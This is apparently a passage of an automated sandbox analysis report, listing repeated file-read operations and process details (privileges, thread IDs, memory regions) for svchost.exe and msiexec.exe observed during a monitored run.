1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
1 | |
| Read Response | size = 8192, size_out = 8192 |
|
1 | |
| Read Response | size = 8191, size_out = 8191 |
|
1 | |
| Close Session | - |
|
1 |
Process #4: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k netsvcs |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:57, Reason: RPC Server |
| Unmonitor | End Time: 00:02:30, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:33 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x354 |
| Parent PID | 0x1e0 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
FB4
0x
B98
0x
8FC
0x
8EC
0x
8C8
0x
8BC
0x
750
0x
314
0x
5FC
0x
13C
0x
7D4
0x
4CC
0x
120
0x
5A0
0x
64C
0x
5CC
0x
508
0x
530
0x
468
0x
1EC
0x
17C
0x
138
0x
4BC
0x
540
0x
124
0x
75C
0x
754
0x
6DC
0x
680
0x
674
0x
670
0x
668
0x
654
0x
630
0x
600
0x
490
0x
484
0x
47C
0x
478
0x
474
0x
3E8
0x
3E0
0x
3D4
0x
374
0x
368
0x
360
0x
358
0x
264
0x
324
0x
9D8
0x
9A8
0x
AE8
0x
B48
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00191fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x0025ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00260fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x00270fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000280000 | 0x00280000 | 0x00280fff | Pagefile Backed Memory | r |
|
|
|
- |
| svchost.exe | 0x00290000 | 0x00297fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x003a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x008f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00900000 | 0x00903fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x00911fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x00920000 | 0x00923fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000930000 | 0x00930000 | 0x0093ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000940000 | 0x00940000 | 0x00940fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x00950fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x0099ffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db | 0x009a0000 | 0x009cffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000009d0000 | 0x009d0000 | 0x00a0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a10000 | 0x00a10000 | 0x00a13fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a20000 | 0x00a20000 | 0x00a2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a60000 | 0x00a60000 | 0x00a9ffff | Private Memory | rw |
|
|
|
- |
| firewallapi.dll.mui | 0x00aa0000 | 0x00abbfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00acdfff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ad0000 | 0x00ad0000 | 0x00ad0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ae0000 | 0x00ae0000 | 0x00b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00b5ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b60000 | 0x00b60000 | 0x00b60fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b70000 | 0x00b70000 | 0x00b70fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000b80000 | 0x00b80000 | 0x00b8ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b90000 | 0x00b90000 | 0x00b90fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000ba0000 | 0x00ba0000 | 0x00ba7fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bb0000 | 0x00bb0000 | 0x00beffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000bf0000 | 0x00bf0000 | 0x00c2ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00c30000 | 0x00efefff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000f00000 | 0x00f00000 | 0x00f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f10000 | 0x00f10000 | 0x00f4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f50000 | 0x00f50000 | 0x00f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f60000 | 0x00f60000 | 0x00f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00f70fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f80000 | 0x00f80000 | 0x00f81fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f90000 | 0x00f90000 | 0x00fcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000fd0000 | 0x00fd0000 | 0x010cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000010d0000 | 0x010d0000 | 0x0110ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001110000 | 0x01110000 | 0x0114ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001150000 | 0x01150000 | 0x01150fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001160000 | 0x01160000 | 0x0116ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001170000 | 0x01170000 | 0x01177fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001180000 | 0x01180000 | 0x011bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011c0000 | 0x011c0000 | 0x011fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0120ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001210000 | 0x01210000 | 0x0121ffff | Private Memory | rw |
|
|
|
- |
| datastore.edb | 0x01220000 | 0x0122ffff | Memory Mapped File | rw |
|
|
|
- |
| datastore.edb | 0x01230000 | 0x0123ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000001240000 | 0x01240000 | 0x0124ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001290000 | 0x01290000 | 0x01297fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012a0000 | 0x012a0000 | 0x012affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012b0000 | 0x012b0000 | 0x012effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012f0000 | 0x012f0000 | 0x012fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001300000 | 0x01300000 | 0x01307fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001310000 | 0x01310000 | 0x0131ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001320000 | 0x01320000 | 0x0135ffff | Private Memory | rw |
|
|
|
- |
| msxml3r.dll | 0x01360000 | 0x01360fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000013b0000 | 0x013b0000 | 0x013effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000013f0000 | 0x013f0000 | 0x0142ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001430000 | 0x01430000 | 0x0144ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000001450000 | 0x01450000 | 0x0148ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001490000 | 0x01490000 | 0x014cffff | Private Memory | rw |
|
|
|
- |
| wuaueng.dll.mui | 0x014d0000 | 0x014d2fff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x00000000014e0000 | 0x014e0000 | 0x014e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| datastore.edb | 0x014f0000 | 0x014fffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000001500000 | 0x01500000 | 0x0153ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001540000 | 0x01540000 | 0x01540fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001570000 | 0x01570000 | 0x015affff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x015b0000 | 0x01615fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001620000 | 0x01620000 | 0x0162ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001630000 | 0x01630000 | 0x0163ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001640000 | 0x01640000 | 0x0164ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001650000 | 0x01650000 | 0x0165ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001660000 | 0x01660000 | 0x0166ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001670000 | 0x01670000 | 0x0167ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001690000 | 0x01690000 | 0x0191afff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001920000 | 0x01920000 | 0x01a1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001a20000 | 0x01a20000 | 0x01a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ac0000 | 0x01ac0000 | 0x01afffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b70000 | 0x01b70000 | 0x01baffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001be0000 | 0x01be0000 | 0x01c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d60000 | 0x01d60000 | 0x01d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001da0000 | 0x01da0000 | 0x01ddffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001de0000 | 0x01de0000 | 0x01edffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x01f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x01faffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fd0000 | 0x01fd0000 | 0x0200ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002010000 | 0x02010000 | 0x0204ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x020bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002130000 | 0x02130000 | 0x0216ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002170000 | 0x02170000 | 0x021affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021d0000 | 0x021d0000 | 0x0220ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002230000 | 0x02230000 | 0x0223ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002250000 | 0x02250000 | 0x0228ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000022b0000 | 0x022b0000 | 0x022effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000022f0000 | 0x022f0000 | 0x023effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002410000 | 0x02410000 | 0x0244ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002460000 | 0x02460000 | 0x0249ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000024a0000 | 0x024a0000 | 0x024affff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000024b0000 | 0x024b0000 | 0x024bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000024c0000 | 0x024c0000 | 0x024cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000024d0000 | 0x024d0000 | 0x024dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000024e0000 | 0x024e0000 | 0x024effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000024f0000 | 0x024f0000 | 0x024fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002510000 | 0x02510000 | 0x0254ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002600000 | 0x02600000 | 0x0263ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002650000 | 0x02650000 | 0x0268ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002690000 | 0x02690000 | 0x026cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002700000 | 0x02700000 | 0x027fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002800000 | 0x02800000 | 0x028bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x028fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002970000 | 0x02970000 | 0x029affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029c0000 | 0x029c0000 | 0x029fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a00000 | 0x02a00000 | 0x02bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c00000 | 0x02c00000 | 0x02c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02c8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ca0000 | 0x02ca0000 | 0x02cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d60000 | 0x02d60000 | 0x02d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002db0000 | 0x02db0000 | 0x02deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002df0000 | 0x02df0000 | 0x02feffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ff0000 | 0x02ff0000 | 0x033effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033f0000 | 0x033f0000 | 0x034effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003530000 | 0x03530000 | 0x0392ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003930000 | 0x03930000 | 0x03b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b30000 | 0x03b30000 | 0x03b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b70000 | 0x03b70000 | 0x03baffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c40000 | 0x03c40000 | 0x03c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c90000 | 0x03c90000 | 0x03ccffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003d20000 | 0x03d20000 | 0x03d5ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x03d60000 | 0x03e1ffff | Memory Mapped File | rw |
|
|
|
- |
|
For performance reasons, the remaining 213 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #7: msiexec.exe
367
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\system32\msiexec.exe |
| Command Line | C:\Windows\system32\MsiExec.exe -Embedding CFC2270FDC242024FCC72EF4DF0EAAC9 |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:01:20, Reason: Child Process |
| Unmonitor | End Time: 00:01:37, Reason: Self Terminated |
| Monitor Duration | 00:00:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x598 |
| Parent PID | 0xef0 (c:\windows\system32\msiexec.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
5F4
0x
5F0
0x
590
0x
58C
0x
98
0x
190
0x
3B0
0x
164
0x
824
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| msiexec.exe.mui | 0x000d0000 | 0x000d0fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x00100000 | 0x00100fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x00100fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00111fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00130fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x00150000 | 0x0018bfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00150fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | r |
|
|
|
- |
| oleaccrc.dll | 0x00170000 | 0x00170fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00181fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x00190000 | 0x00193fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x00190000 | 0x00193fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
